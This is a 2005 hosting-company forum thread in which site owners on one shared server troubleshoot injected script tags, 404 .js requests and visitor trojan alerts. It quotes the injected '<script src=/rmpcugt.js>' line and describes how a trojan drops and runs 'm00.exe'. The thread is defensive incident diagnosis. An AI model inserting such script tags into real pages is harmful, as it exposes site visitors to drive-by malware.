Blackcat Posted September 5, 2005 Share Posted September 5, 2005 Today three strange things happened on my blog (http://blackcat.bloggy.biz) 1- The folder /archive/images had become public (the images were not supposed to be shown in a list, even hotlink was used to forbid the usage of bandwidth of my domain) 2- An user made a complaint about the forum (http://bloggy.biz/board) saying that "in at least three or four moments, a trojan tried to enter my pc, the so called ByteVerify that exploits java of the forum to attack a computer". According to my experience, PhpBB does not use any java, am l right? Should l think it is a problem of this user only (in her pc, maybe)? 3- Another user, exploring the folder abovementioned, the one suddenly become visible to public, told that "my firewall informed me that an application called m00 was attempting to access internet. I never saw this .exe before, but l noticed it was created on my desktop in the moment l opened the folder. I tried to delete it, but it was impossible. This application tried further to access l don't know which process, so l denied access to it and finally deleted m00. There has been another problem, my task manager: l used it to close the explorer page opened to see your images, not responding. Everything has disappeared, even taskbar. Even restarting the pc nothing improved, l has been obliged to reboot it loading the last known working configuration" I really don't know what's happening: my Norton Internet Security and Personal Firewall did not find anything suspicious. Could you maybe help me? Link to comment Share on other sites More sharing options...
TCH-Thomas Posted September 5, 2005 Share Posted September 5, 2005 Hi Blackcat, I don´t speak italian so I don´t know if this thread is relevant to your issue, but from what I understand from reading your post, I would check it out. Link to comment Share on other sites More sharing options...
Blackcat Posted September 5, 2005 Author Share Posted September 5, 2005 Hi Blackcat,I don´t speak italian so I don´t know if this thread is relevant to your issue, but from what I understand from reading your post, I would check it out. <{POST_SNAPBACK}> Hi Thomas! How are you? Well, l double checked as your linked thread suggests, but found nothing, even in the source code of index php file Really don't know where else to look, to find any answer Link to comment Share on other sites More sharing options...
stevevan Posted September 5, 2005 Share Posted September 5, 2005 I have to ask the obvious...you ARE running the most current up-to-date version of phpBB, right? Link to comment Share on other sites More sharing options...
Blackcat Posted September 5, 2005 Author Share Posted September 5, 2005 I have to ask the obvious...you ARE running the most current up-to-date version of phpBB, right? <{POST_SNAPBACK}> Absolutely YES!!! Link to comment Share on other sites More sharing options...
stevevan Posted September 6, 2005 Share Posted September 6, 2005 I assumed as much, but just wanted to be sure. Hopefully one of the more knowledgable bloggers will chime in, but it sounds to me like possibly somehow your administrative password may have gotten compromised. As I don't have a blog, I cannot really say much beyond what immediately jumps out to me. (But I think that you already thought of that, too!) Link to comment Share on other sites More sharing options...
TweezerMan Posted September 6, 2005 Share Posted September 6, 2005 1- The folder /archive/images had become public (the images were not supposed to be shown in a list, even hotlink was used to forbid the usage of bandwidth of my domain) <{POST_SNAPBACK}> The directory is publicly viewable, which isn't quite the same as 'become public'. Hotlinking will not prevent someone from viewing the directory by itself. If you don't want the directory to be viewable, you need to go into the Index Manager in your CPanel and set that directory to "No Indexes". 2- An user made a complaint about the forum (http://bloggy.biz/board) saying that "in at least three or four moments, a trojan tried to enter my pc, the so called ByteVerify that exploits java of the forum to attack a computer". According to my experience, PhpBB does not use any java, am l right? Should l think it is a problem of this user only (in her pc, maybe)? <{POST_SNAPBACK}> It's not that phpBB does or doesn't use java - the user is saying that something on one or more of your forum pages is attempting to download a trojan. A link to a specific page where this occurring would be extremely helpful, as it could be verified whether or not there is mailcious code in the page. 3- Another user, exploring the folder abovementioned, the one suddenly become visible to public, told that "my firewall informed me that an application called m00 was attempting to access internet. I never saw this .exe before, but l noticed it was created on my desktop in the moment l opened the folder. I tried to delete it, but it was impossible. This application tried further to access l don't know which process, so l denied access to it and finally deleted m00. There has been another problem, my task manager: l used it to close the explorer page opened to see your images, not responding. Everything has disappeared, even taskbar. Even restarting the pc nothing improved, l has been obliged to reboot it loading the last known working configuration" <{POST_SNAPBACK}> Your user was infected by a trojan, known as 'Trojan Moo': * Trojan is carried inside of an infected .jpg file* Attempts to download a file from a URL specified by the author and save it as "m00.exe" * Executes m00.exe Opening the folder should not have triggered this trojan - I think you'd have to actually view an infected .jpg file. It's possible that the user had already been infected and the timing of 'm00.exe' appearing on the desktop at the same time the /images folder was opened was merely coincidence. I really don't know what's happening: my Norton Internet Security and Personal Firewall did not find anything suspicious. <{POST_SNAPBACK}> You may not see anything on your PC - the problems (if they exist) would be with files on the server. Link to comment Share on other sites More sharing options...
stevevan Posted September 6, 2005 Share Posted September 6, 2005 Thanks for the info, David! (Steve puts info away in back memory bank!) Link to comment Share on other sites More sharing options...
Blackcat Posted September 6, 2005 Author Share Posted September 6, 2005 David... no words for your great answer, except an enormous THANKYOU!!!!! Well, now users complaining with forum are two. Both have problems with the home page (http://bloggy.biz/board), firewalls and antivirus get crazy, programs try to be installed on pc and so on. I made a search on the php codes, but l have not been able to find anything regarding hidden links Link to comment Share on other sites More sharing options...
TweezerMan Posted September 6, 2005 Share Posted September 6, 2005 Looking at "View Source" of your phpBB main page, this line is the very first line of code, even before the !DOCTYPE or <html> tag: ><script language=JavaScript src=/rmpcugt.js></script> The link to the script does not appear to be valid now. But the position of this script, ahead of all other HTML code, in an invalid place for a <script> tag, and the odd, psuedo-random name of the script leads me to suspect that this is not your code, but code that a malicious attacker may have inserted into your site. Link to comment Share on other sites More sharing options...
Blackcat Posted September 6, 2005 Author Share Posted September 6, 2005 Looking at "View Source" of your phpBB main page, this line is the very first line of code, even before the !DOCTYPE or <html> tag: ><script language=JavaScript src=/rmpcugt.js></script> The link to the script does not appear to be valid now. But the position of this script, ahead of all other HTML code, in an invalid place for a <script> tag, and the odd, psuedo-random name of the script leads me to suspect that this is not your code, but code that a malicious attacker may have inserted into your site. <{POST_SNAPBACK}> You're right!!! I did not put this script in my header... And, honestly, l did not make my search in the header, but just in the page body ( ). As soon as my Cpanel works again (now l think something strange is happening, l have an error code "License File Expired" ) l will delete it. Thank you again Link to comment Share on other sites More sharing options...
TCH-Bruce Posted September 6, 2005 Share Posted September 6, 2005 As soon as my Cpanel works again (now l think something strange is happening, l have an error code "License File Expired" ) l will delete it. Open a ticket with the help desk and report this please. Link to comment Share on other sites More sharing options...
Blackcat Posted September 6, 2005 Author Share Posted September 6, 2005 Open a ticket with the help desk and report this please. <{POST_SNAPBACK}> Done Link to comment Share on other sites More sharing options...
Blackcat Posted September 6, 2005 Author Share Posted September 6, 2005 Ok. I've tried to find where this malicious script has been inserted. I could not find it Moreover in my first page source code (you mean html, right? ) it does not appear anymore. I took a look also in my templates folder, in the include folder but nothing. Link to comment Share on other sites More sharing options...
TweezerMan Posted September 6, 2005 Share Posted September 6, 2005 I no longer see the <script> tag either. Maybe you or the Help Desk did something that fixed phpBB back to the way it was? Link to comment Share on other sites More sharing options...
Blackcat Posted September 6, 2005 Author Share Posted September 6, 2005 I no longer see the <script> tag either. Maybe you or the Help Desk did something that fixed phpBB back to the way it was? <{POST_SNAPBACK}> I could not do anything until Help Desk fixed my problem with CPanel. And did not even ask them to remove the script I am starting to worry about safety of my site: may l have been hacked or something? Link to comment Share on other sites More sharing options...
OldTimer Posted September 6, 2005 Share Posted September 6, 2005 I haven't used phpbb in awhile. But one of the first things you could do is change your admin. password. Greg Link to comment Share on other sites More sharing options...
Blackcat Posted September 7, 2005 Author Share Posted September 7, 2005 I haven't used phpbb in awhile. But one of the first things you could do is change your admin. password. Greg <{POST_SNAPBACK}> Hi Greg I did it two weeks ago, also because l was out of my town and l forgot it Now the problem is becoming wider. It seems to affect also my jpeg folders on two different blogs... Link to comment Share on other sites More sharing options...
Blackcat Posted September 7, 2005 Author Share Posted September 7, 2005 Just a question on a small doubt.... On all awstats of all subdomains, l found in 404 pages listed, hundreds of .js scripts. How could possibly someone force readers to download a script (not present in my folders) when they read random EVERY page of the domain? Link to comment Share on other sites More sharing options...
curtis Posted September 7, 2005 Share Posted September 7, 2005 Blackcat, in your awstats under 404 errors, is this what you are getting? I am not using phpbb or any other forum or blog. I started getting all these 404 .js errors about a week ago. Link to comment Share on other sites More sharing options...
Blackcat Posted September 7, 2005 Author Share Posted September 7, 2005 Blackcat, in your awstats under 404 errors, is this what you are getting? I am not using phpbb or any other forum or blog. I started getting all these 404 .js errors about a week ago. <{POST_SNAPBACK}> Exactly the same!!! Hundreds of odd .js scripts!!! And, moreover, l found in Awstats someone called "Mrbean" who appear to be logged in my site as authenticated user. More than obvious, l don't know such user My .js scripts, anyway, started in August, about in the middle of the month. This "Mrbean" authenticated last time on August 16th. And yesterday another authenticated user logged in. Name= "" It's getting worse and worse Link to comment Share on other sites More sharing options...
curtis Posted September 7, 2005 Share Posted September 7, 2005 Well I did start getting all these .js errors back in August. I don't check the stats for this site very often. I don't have any authenticated user for August or September. I went thru my site paga by page looking at the source code and could find no reference to any .js file. I have Viper guestbook installed and thought it may be the problem so I disabled it but continued to receive the errors. I am about at a loss of what to do next. Link to comment Share on other sites More sharing options...
curtis Posted September 9, 2005 Share Posted September 9, 2005 Blackcat, Did you find a fix or the source of the .js error problem? Yesterday I tried changing some code on my index.html page to see if that would have any effect. I then tried to validate the page but the validator said I had a javascript before the DOC TYPE. I looked at the page source but didn't see any javascript. Again I tried to validate and the page validated with no problem. If you or anyone has suggestions I'm open to trying most anything. Link to comment Share on other sites More sharing options...
Blackcat Posted September 9, 2005 Author Share Posted September 9, 2005 I have the same problem, Curtis. Moreover complaints are becoming constant and increasing I think the script is not put on a specific page, because if so, who put the script must have access to ftp or cpanel, as l have .js problems on weblogs (running Movable Type) on board (running Phpbb) and on my home page made with Front Page. Nor we should not have so many 404 .js pages. I'm getting crazy, working till late night from home to find out a possible solution, but nothing helps. Guys at TCH are working on a ticket l opened, but they also did not find any malicious file. Anyway, whoever did changes, did not hack or crack any site. This is a very annoying "joke", made just to disturb users and readers. (If l found him/her l strangle him/her ) There is apparently no code inserted, no script, no iframe. Nothing. But the problem still persists.... Link to comment Share on other sites More sharing options...
Blackcat Posted September 9, 2005 Author Share Posted September 9, 2005 Anyway, it is a nice game to pass the time: reload the validator page once a minute and the script disappears. Then the minute later it comes back with another name. And your page doesn't show anything Link to comment Share on other sites More sharing options...
OldTimer Posted September 9, 2005 Share Posted September 9, 2005 I see at http://blackcat.bloggy.biz/ there is now a gvspmjf.js at the top of the page. But it comes up 404. I'm not getting any warnings from Norton. I'm using Firefox. Have you asked the users what browser they are using? And just maybe that code is being added to your database. Have you taken a look there? Just ideas, I'm by far no expert on this stuff. Greg Link to comment Share on other sites More sharing options...
Blackcat Posted September 9, 2005 Author Share Posted September 9, 2005 I see at http://blackcat.bloggy.biz/ there is now a gvspmjf.js at the top of the page.But it comes up 404. I'm not getting any warnings from Norton. I'm using Firefox. Have you asked the users what browser they are using? And just maybe that code is being added to your database. Have you taken a look there? Just ideas, I'm by far no expert on this stuff. Greg <{POST_SNAPBACK}> Yes! Of course it shows, but randomly! And, l swear, there is no script in the source code of the page! All files are 404, and this is why some Firewalls (including mine) did not even inform user of this download attempt. I don't think it is a problem of browser or OS: already asked forum users and there are almost all cases and sortings Even for the DB: weblogs have a database, board has another different database, home page doesn't have any. But all three have the same problem. Thank you for your ideas, Greg The more we are, the faster we beat .js!!! Link to comment Share on other sites More sharing options...
curtis Posted September 9, 2005 Share Posted September 9, 2005 I'm about the same as Blackcat. 2 databases, 1 for a guestbook and 1 for site search. 150 pages that use no db- all getting the .js errors. I am far from being an expert on db's but I did look thru both and found nothing that looked suspicious. The site is on server 60. Link to comment Share on other sites More sharing options...
Blackcat Posted September 9, 2005 Author Share Posted September 9, 2005 The site is on server 60. <{POST_SNAPBACK}> Me too!!!! Link to comment Share on other sites More sharing options...
OldTimer Posted September 9, 2005 Share Posted September 9, 2005 (edited) That's odd I'm also on server 60 But I don't have a site up at the moment just a html page. I'll go take a look. The random part does seem odd. Greg ok just checked and I've got it too. ><script language=JavaScript src=/kslljmr.js></script> <html> <head> <title>ontalkradio.com</title> </head> <body> ontalkradio.com </body> </html> Edited September 9, 2005 by OldTimer Link to comment Share on other sites More sharing options...
curtis Posted September 9, 2005 Share Posted September 9, 2005 Maybe I should clarify my last post a little. When I said I get the .js error on every page it has shown up for evey page but not every page on every visit. When someone visits the site, according to the error log, I have 1 .js error regardless of how many pages the visitor views. I hope this doesn't sound as confusing to you as it does to me. Link to comment Share on other sites More sharing options...
OldTimer Posted September 9, 2005 Share Posted September 9, 2005 I just checked my page again and now it's not there. But we are all on server 60 ? Link to comment Share on other sites More sharing options...
Blackcat Posted September 9, 2005 Author Share Posted September 9, 2005 I just checked my page again and now it's not there. But we are all on server 60 ? <{POST_SNAPBACK}> Yes, we are all on server 60 Also my script appears and disappears randomly... like Curtis explained Link to comment Share on other sites More sharing options...
abinidi Posted September 9, 2005 Share Posted September 9, 2005 (edited) Have you tried opening a help desk ticket, and pointing them at this thread? I wonder if the admins are aware thatthere is a problem, and that server 60 seems to be the one affected.... EDIT: I realize that you opened a help desk ticket before, but they might think that the problem you opened the ticket about is already resolved. It seems that there might be a larger issue here, and pointing them to this thread might be helpful. Just my 2cents worth!! Edited September 9, 2005 by abinidi Link to comment Share on other sites More sharing options...
cajunman4life Posted September 9, 2005 Share Posted September 9, 2005 I think Paul is on to something here. Perhaps this is larger than just a few accounts. Link to comment Share on other sites More sharing options...
mitten Posted September 9, 2005 Share Posted September 9, 2005 (edited) I think Paul is on to something here. Perhaps this is larger than just a few accounts. <{POST_SNAPBACK}> Yup. I've been having this same trouble - for the last 4 or so weeks, loads and loads of 404 reports for randomly named scripts with names like abcdef.js and now I'm getting reports from users whos are crashing or getting virus alerts when they visit the site. I haven't been able to figure out what's going on either. I thought maybe it was something with an old installation of punBB that we don't use anymore, but that doesn't seem to be it. Are you all opening tickets on this? Is that the best course of action at this point? It sure does look more like someone has put malicious code on the server, not on our sites per se. (The site in question is http://martinirepublic.com) Edited September 9, 2005 by mitten Link to comment Share on other sites More sharing options...
Head Guru Posted September 15, 2005 Share Posted September 15, 2005 TCH clients - Please continue to follow progress on this thread here: http://www.totalchoicehosting.com/forums/i...showtopic=22710 If you do not have password please IM myself or another staff member. We are making progress. Bill Link to comment Share on other sites More sharing options...
Recommended Posts